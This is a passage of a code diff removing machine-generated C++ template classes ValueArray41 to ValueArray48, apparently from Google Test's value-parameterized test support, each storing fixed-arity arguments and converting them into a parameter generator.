-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_), static_cast<T>(v41_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray41& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-  const T41 v41_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42>
-class ValueArray42 {
- public:
-  ValueArray42(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-      T42 v42) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14),
-      v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20),
-      v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25), v26_(v26),
-      v27_(v27), v28_(v28), v29_(v29), v30_(v30), v31_(v31), v32_(v32),
-      v33_(v33), v34_(v34), v35_(v35), v36_(v36), v37_(v37), v38_(v38),
-      v39_(v39), v40_(v40), v41_(v41), v42_(v42) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_), static_cast<T>(v41_),
-        static_cast<T>(v42_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray42& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-  const T41 v41_;
-  const T42 v42_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43>
-class ValueArray43 {
- public:
-  ValueArray43(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-      T42 v42, T43 v43) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6),
-      v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13),
-      v14_(v14), v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19),
-      v20_(v20), v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25),
-      v26_(v26), v27_(v27), v28_(v28), v29_(v29), v30_(v30), v31_(v31),
-      v32_(v32), v33_(v33), v34_(v34), v35_(v35), v36_(v36), v37_(v37),
-      v38_(v38), v39_(v39), v40_(v40), v41_(v41), v42_(v42), v43_(v43) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_), static_cast<T>(v41_),
-        static_cast<T>(v42_), static_cast<T>(v43_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray43& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-  const T41 v41_;
-  const T42 v42_;
-  const T43 v43_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44>
-class ValueArray44 {
- public:
-  ValueArray44(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-      T42 v42, T43 v43, T44 v44) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5),
-      v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12),
-      v13_(v13), v14_(v14), v15_(v15), v16_(v16), v17_(v17), v18_(v18),
-      v19_(v19), v20_(v20), v21_(v21), v22_(v22), v23_(v23), v24_(v24),
-      v25_(v25), v26_(v26), v27_(v27), v28_(v28), v29_(v29), v30_(v30),
-      v31_(v31), v32_(v32), v33_(v33), v34_(v34), v35_(v35), v36_(v36),
-      v37_(v37), v38_(v38), v39_(v39), v40_(v40), v41_(v41), v42_(v42),
-      v43_(v43), v44_(v44) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_), static_cast<T>(v41_),
-        static_cast<T>(v42_), static_cast<T>(v43_), static_cast<T>(v44_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray44& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-  const T41 v41_;
-  const T42 v42_;
-  const T43 v43_;
-  const T44 v44_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45>
-class ValueArray45 {
- public:
-  ValueArray45(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-      T42 v42, T43 v43, T44 v44, T45 v45) : v1_(v1), v2_(v2), v3_(v3), v4_(v4),
-      v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11),
-      v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16), v17_(v17),
-      v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22), v23_(v23),
-      v24_(v24), v25_(v25), v26_(v26), v27_(v27), v28_(v28), v29_(v29),
-      v30_(v30), v31_(v31), v32_(v32), v33_(v33), v34_(v34), v35_(v35),
-      v36_(v36), v37_(v37), v38_(v38), v39_(v39), v40_(v40), v41_(v41),
-      v42_(v42), v43_(v43), v44_(v44), v45_(v45) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_), static_cast<T>(v41_),
-        static_cast<T>(v42_), static_cast<T>(v43_), static_cast<T>(v44_),
-        static_cast<T>(v45_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray45& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-  const T41 v41_;
-  const T42 v42_;
-  const T43 v43_;
-  const T44 v44_;
-  const T45 v45_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46>
-class ValueArray46 {
- public:
-  ValueArray46(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-      T42 v42, T43 v43, T44 v44, T45 v45, T46 v46) : v1_(v1), v2_(v2), v3_(v3),
-      v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10),
-      v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16),
-      v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22),
-      v23_(v23), v24_(v24), v25_(v25), v26_(v26), v27_(v27), v28_(v28),
-      v29_(v29), v30_(v30), v31_(v31), v32_(v32), v33_(v33), v34_(v34),
-      v35_(v35), v36_(v36), v37_(v37), v38_(v38), v39_(v39), v40_(v40),
-      v41_(v41), v42_(v42), v43_(v43), v44_(v44), v45_(v45), v46_(v46) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_), static_cast<T>(v41_),
-        static_cast<T>(v42_), static_cast<T>(v43_), static_cast<T>(v44_),
-        static_cast<T>(v45_), static_cast<T>(v46_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray46& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-  const T41 v41_;
-  const T42 v42_;
-  const T43 v43_;
-  const T44 v44_;
-  const T45 v45_;
-  const T46 v46_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47>
-class ValueArray47 {
- public:
-  ValueArray47(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-      T42 v42, T43 v43, T44 v44, T45 v45, T46 v46, T47 v47) : v1_(v1), v2_(v2),
-      v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10),
-      v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16),
-      v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22),
-      v23_(v23), v24_(v24), v25_(v25), v26_(v26), v27_(v27), v28_(v28),
-      v29_(v29), v30_(v30), v31_(v31), v32_(v32), v33_(v33), v34_(v34),
-      v35_(v35), v36_(v36), v37_(v37), v38_(v38), v39_(v39), v40_(v40),
-      v41_(v41), v42_(v42), v43_(v43), v44_(v44), v45_(v45), v46_(v46),
-      v47_(v47) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_), static_cast<T>(v41_),
-        static_cast<T>(v42_), static_cast<T>(v43_), static_cast<T>(v44_),
-        static_cast<T>(v45_), static_cast<T>(v46_), static_cast<T>(v47_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray47& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-  const T41 v41_;
-  const T42 v42_;
-  const T43 v43_;
-  const T44 v44_;
-  const T45 v45_;
-  const T46 v46_;
-  const T47 v47_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48>
-class ValueArray48 {
- public:
-  ValueArray48(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-      T42 v42, T43 v43, T44 v44, T45 v45, T46 v46, T47 v47, T48 v48) : v1_(v1),
-      v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9),
-      v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15),
-      v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21),
-      v22_(v22), v23_(v23), v24_(v24), v25_(v25), v26_(v26), v27_(v27),
-      v28_(v28), v29_(v29), v30_(v30), v31_(v31), v32_(v32), v33_(v33),
-      v34_(v34), v35_(v35), v36_(v36), v37_(v37), v38_(v38), v39_(v39),
-      v40_(v40), v41_(v41), v42_(v42), v43_(v43), v44_(v44), v45_(v45),
-      v46_(v46), v47_(v47), v48_(v48) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_), static_cast<T>(v41_),
-        static_cast<T>(v42_), static_cast<T>(v43_), static_cast<T>(v44_),
-        static_cast<T>(v45_), static_cast<T>(v46_), static_cast<T>(v47_),
-        static_cast<T>(v48_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray48& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
